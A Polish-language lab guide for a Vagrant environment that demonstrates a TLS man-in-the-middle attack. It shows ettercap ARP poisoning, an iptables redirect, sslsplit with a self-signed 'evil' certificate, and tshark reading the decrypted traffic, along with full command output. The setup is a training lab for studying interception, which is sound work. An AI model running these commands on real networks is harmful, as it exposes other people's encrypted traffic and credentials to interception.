Środowisko:

- Kali Linux
- 2x Centos 7

Dostęp do maszyn:

user: vagrant
pass: vagrant

Uwaga!: Środowisko wykorzystuje [vagrant template](Vagrantfile) 

Zainstaluj: https://www.vagrantup.com/downloads

Instrukcja:

1. Uruchom środowisko 

```
vagrant up
```

Środowisko również automatycznie konfiguruje narzędzie SSL split (patrz [Vagrantfile](Vagrantfile))

```
sudo openssl req -x509 -nodes -newkey rsa:2048 -subj "/CN=evil" -keyout ./evil.key -out ./evil.crt 2>/dev/null
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8443
sudo sslsplit -d -l connections.log -k evil.key -c evil.crt -p /var/run/sslsplit.pid -X intercepted.pcap https 0.0.0.0 8443

```

2. Sprawdź połączenie HTTPS pomiędzy klientem (192.168.56.3) a serwerem (192.168.56.10)

left click => ![left_click](png/left_click_menu.png)

![pre_ssl_spoofing](png/pre_ssl_spoofing.png)

```
sudo openssl s_client -showcerts -connect 192.168.56.10:443 </dev/null

```

```
[vagrant@client ~]$ sudo openssl s_client -showcerts -connect 192.168.56.10:443 </dev/null
CONNECTED(00000003)
depth=0 C = --, ST = SomeState, L = SomeCity, O = SomeOrganization, OU = SomeOrganizationalUnit, CN = server, emailAddress = root@server
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C = --, ST = SomeState, L = SomeCity, O = SomeOrganization, OU = SomeOrganizationalUnit, CN = server, emailAddress = root@server
verify error:num=21:unable to verify the first certificate
verify return:1
---
Certificate chain
 0 s:/C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=server/emailAddress=root@server
   i:/C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=server/emailAddress=root@server
<ucięte>

```


3. Uruchom narzędzie ettercap w celu wykonania ARP poisoning

```
sudo ettercap -T -q -i eth1 -M arp /192.168.56.10/192.168.56.3/

```

3. Sprawdź ponownie połączenie HTTPS pomiędzy klientem (192.168.56.3) a serwerem (192.168.56.10)

![post_ssl_spoofing](png/post_ssl_spoofing.png)

```
sudo openssl s_client -showcerts -connect 192.168.56.10:443 </dev/null

```

```
[vagrant@client ~]$ sudo openssl s_client -showcerts -connect 192.168.56.10:443 </dev/null
CONNECTED(00000003)
depth=1 CN = evil
verify error:num=19:self signed certificate in certificate chain
---
Certificate chain
 0 s:/C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=server/emailAddress=root@server
   i:/CN=evil
-----BEGIN CERTIFICATE-----
MIIDxjCCAq6gAwIBAgIFAPswgn8wDQYJKoZIhvcNAQELBQAwDzENMAsGA1UEAwwE
ZXZpbDAeFw0yMjEwMTEyMjA4MzJaFw0yMzEwMTEyMjA4MzJaMIGdMQswCQYDVQQG
EwItLTESMBAGA1UECAwJU29tZVN0YXRlMREwDwYDVQQHDAhTb21lQ2l0eTEZMBcG
A1UECgwQU29tZU9yZ2FuaXphdGlvbjEfMB0GA1UECwwWU29tZU9yZ2FuaXphdGlv
bmFsVW5pdDEPMA0GA1UEAwwGc2VydmVyMRowGAYJKoZIhvcNAQkBFgtyb290QHNl
cnZlcjCCASAwDQYJKoZIhvcNAQEBBQADggENADCCAQgCggEBAMCgvXrQZDDdjOYe
3RoOQG26OuohxV/rlNMN5UiTRrPS8vWPaTmp118z625XkaTTKK/h2NWm0/L20qLs
Ghk7LBBsywTRbV/d+50hl+y4BUZedrLWBwIDuiuewx/8QwJr2CUpxw5YccJjYoGV
S82hemoeS3+p6I3dReOC/97kR0TE5nMo5Dg6hwEXEjOaJxJ6Np5cMssTlmK4AsrW
xMa/eMO5aBYSkNgWus9aTR2hDYvBH31HQ3SAQ/6Yf3hhLpZv+O+6/7b5GEzAzmtU
etLh3+cYjHQU12bb5wF+N2dMYAyTgy5RE9LQUO6ENyDXWoceKwBYq9ZxPLHEJCLe
OEpl8FECAQOjgZswgZgwHQYDVR0OBBYEFH0aFY9xjchtN5oQHUryFQ8AdlGOMEoG
A1UdIwRDMEGAFKRcCNqrIsa2vccUzBLUPD6FveKNoROkETAPMQ0wCwYDVQQDDARl
dmlsghRyENs33O32kOZfdMMN4oxpFJDWwTAJBgNVHRMEAjAAMAsGA1UdDwQEAwIF
oDATBgNVHSUEDDAKBggrBgEFBQcDATANBgkqhkiG9w0BAQsFAAOCAQEAMDjYfNEM
ilZYrbQ1Up3Q7TkOjZ8lzoh+7Z+YMMYTy4gxnUakntRchL9435oG5eDJ/erwfhgn
ZB5VOg10zNtyspi28kfhC7TQZD518mLxX0jkNZ9eA/PYPie+2maBuRbG1I+7VnQI
aZy/rcsCkmrCSIcJEMIx5pmHbWZqXfKiAPKS0zfQvul9oEUT4W70hPsdig/8Lwxq
7JM7kZdEvXTDAS0uDHmnG07yD+KQEMcD6wWLVAaTJXv1jrPQXvlegROH1j2b5Tzn
1EKJrU+oYyxjnTgP8iUbA6dNUW+tELNJ8jcxSXizVNMbw7hVnL8htdsKd/bM1A8T
Kld4Vd0jrhR2qA==
-----END CERTIFICATE-----
 1 s:/CN=evil
   i:/CN=evil
-----BEGIN CERTIFICATE-----
MIIC/zCCAeegAwIBAgIUchDbN9zt9pDmX3TDDeKMaRSQ1sEwDQYJKoZIhvcNAQEL
BQAwDzENMAsGA1UEAwwEZXZpbDAeFw0yMjEwMTIyMTQ2NTJaFw0yMjExMTEyMTQ2
NTJaMA8xDTALBgNVBAMMBGV2aWwwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQCZLyRNC49NIDqgryZGrzVoOPn0Q1C3W0LmUe5LBiN76901onm5sZMcYwt1
JlUiRsZw1a14oVj4B53aP/Ml6RGv4XQKsMbggdYjUAvv8QO/YR8ycbMOfBwTMqAE
/mhnww2If5OGUGgDVfpvtYXQh9ItvGe6Yg5+7zTTA1HB4Y8cbnLBggx0d4rp2snB
UgyngDSUK1VKM7aVXNvFI6aCjxFIVgDBIQg0LCPIIUnG+Ai36rJOMrpnjh4js15A
QQA1blS0++neCHPTUemyZ4MS5F162uAAKyttf13xgA/7OzTy6ZGbOLLStyaDKaGY
J1hS313RtBEq4Gdi9h9PlAgiap7nAgMBAAGjUzBRMB0GA1UdDgQWBBSkXAjaqyLG
tr3HFMwS1Dw+hb3ijTAfBgNVHSMEGDAWgBSkXAjaqyLGtr3HFMwS1Dw+hb3ijTAP
BgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBS5BL1Kq2LoNylgHib
wYz9lTRPIO0lXCHN2Kd6RxiPfQmHAZGVdcMojjkKz9aZxfC7hErb/RUZSbivFoE5
ykAMHwAc12oGGJsA9uhqJj3kFO7O0mU0MhgOGUdBEinGDO5DCdXxIkuF+DI0UwqY
SD3TVGtYQPyCZJ5gJYGS8jjeJOF8uCM2tC30m0SEzXRaU8Bx5lwMTh+QxND9/SrI
WPYDT6EComZa7HrW8/2O1YxQxaEvZplpvU4DebTQGkAoeBYPHPGruqVoeUQGyW/w
acRvjcF6rpAwztRvSs0Ci0AcdaH+wIK7K0AYeSzuKLfxvDslmPRTGD6aLmO+7fKj
YXcO
-----END CERTIFICATE-----
---
Server certificate
subject=/C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=server/emailAddress=root@server
issuer=/CN=evil
---
No client certificate CA names sent
Peer signing digest: SHA512
Server Temp Key: ECDH, P-256, 256 bits
---
SSL handshake has read 2251 bytes and written 415 bytes
---
New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES256-GCM-SHA384
    Session-ID: E58AC728AEEF3CF08BDD5DDECF2910DCE8B9502E2DAC2E62F5222F6935078892
    Session-ID-ctx: 
    Master-Key: 3911BD45896B26BE93ACB628053E45B1FAEF75DF8FBA248A2F50B00AE1806A15DCDEC781635FCF60FBF4646245358BE9
    Key-Arg   : None
    Krb5 Principal: None
    PSK identity: None
    PSK identity hint: None
    Start Time: 1665612513
    Timeout   : 300 (sec)
    Verify return code: 19 (self signed certificate in certificate chain)
---
DONE

```

4. Zweryfikuj plik connections.log i intercepted.pcap

```

tshark -r intercepted.pcap -Y 'http'

```

```
┌──(root㉿attacker)-[/home/vagrant]
└─# tshark -r intercepted.pcap -Y 'http'
Running as user "root" and group "root". This could be dangerous.
   16  72.793913 192.168.56.3 → 192.168.56.10 HTTP 502 GET / HTTP/1.1 
   23  72.803928 192.168.56.10 → 192.168.56.3 HTTP 571 HTTP/1.1 403 Forbidden  (text/html)
   31  73.905800 192.168.56.3 → 192.168.56.10 HTTP 535 GET /noindex/css/fonts/Light/OpenSans-Light.woff HTTP/1.1 
   35  73.909933 192.168.56.10 → 192.168.56.3 HTTP 295 HTTP/1.1 404 Not Found  (text/html)
   43  73.921930 192.168.56.3 → 192.168.56.10 HTTP 448 GET /images/poweredby.png HTTP/1.1 
   49  73.926908 192.168.56.10 → 192.168.56.3 HTTP 1090 HTTP/1.1 200 OK  (PNG)
   57  74.059324 192.168.56.3 → 192.168.56.10 HTTP 533 GET /noindex/css/fonts/Bold/OpenSans-Bold.woff HTTP/1.1 
   62  74.065021 192.168.56.3 → 192.168.56.10 HTTP 448 GET /images/apache_pb.gif HTTP/1.1 
   66  74.065952 192.168.56.10 → 192.168.56.3 HTTP 293 HTTP/1.1 404 Not Found  (text/html)
   74  74.066845 192.168.56.10 → 192.168.56.3 HTTP 920 HTTP/1.1 200 OK  (GIF89a)
   82  74.478128 192.168.56.3 → 192.168.56.10 HTTP 543 GET /noindex/css/fonts/Light/OpenSans-Light.ttf HTTP/1.1 
   86  74.482086 192.168.56.10 → 192.168.56.3 HTTP 294 HTTP/1.1 404 Not Found  (text/html)
   94  74.677969 192.168.56.3 → 192.168.56.10 HTTP 541 GET /noindex/css/fonts/Bold/OpenSans-Bold.ttf HTTP/1.1 
   98  74.682407 192.168.56.10 → 192.168.56.3 HTTP 292 HTTP/1.1 404 Not Found  (text/html)
```